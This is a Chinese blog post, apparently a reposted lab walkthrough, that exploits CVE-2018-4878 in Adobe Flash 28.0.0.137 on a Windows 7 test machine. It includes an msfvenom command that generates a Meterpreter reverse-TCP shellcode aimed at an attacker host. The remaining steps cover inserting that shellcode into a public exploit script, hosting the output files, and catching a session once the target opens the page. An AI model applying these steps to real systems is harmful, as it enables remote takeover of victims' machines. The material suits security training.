Adobe flash player 28漏洞攻击的分析

Adobe flash player 28漏洞攻击的分析,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。

Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。
攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会触发漏洞,可直接getshell。准备工作:靶机信息:192.168.2.134(windows 7 SP1)Flash版本:28.0.0.137攻击机信息:192.168.2.132(kali linux)漏洞利用脚本:CVE-2018-4878-master漏洞利用:

1.使用msfvenom生成shellcode,msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.132 LPORT=7777 -f python>shellcode.txt>。

Adobe flash player 28漏洞攻击的分析

2.替换原 cve-2018-4878.py中的shellcode,并修改参数stageless=False。Adobe flash player 28漏洞攻击的分析

3.在代码中修改要生成的文件和路径。

Adobe flash player 28漏洞攻击的分析

4.执行修改后的cve-2018-4878.py文件,生成index和exploit两个文件。Adobe flash player 28漏洞攻击的分析

5.将生成的两个文件复制到web目录环境下。

Adobe flash player 28漏洞攻击的分析

6.在kali的msf中启用监听。

Adobe flash player 28漏洞攻击的分析

7.在win7主机中使用含漏洞的浏览器和Adobe Flash访问http://192.168.2.132/index.html,kali中即可获取到靶机会话。

Adobe flash player 28漏洞攻击的分析

看完上述内容,你们掌握Adobe flash player 28漏洞攻击的分析的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注亿速云行业资讯频道,感谢各位的阅读!

原创文章,作者:carmelaweatherly,如若转载,请注明出处:https://blog.ytso.com/220541.html

(0)
上一篇 2022年1月2日
下一篇 2022年1月2日

相关推荐

发表回复

登录后才能评论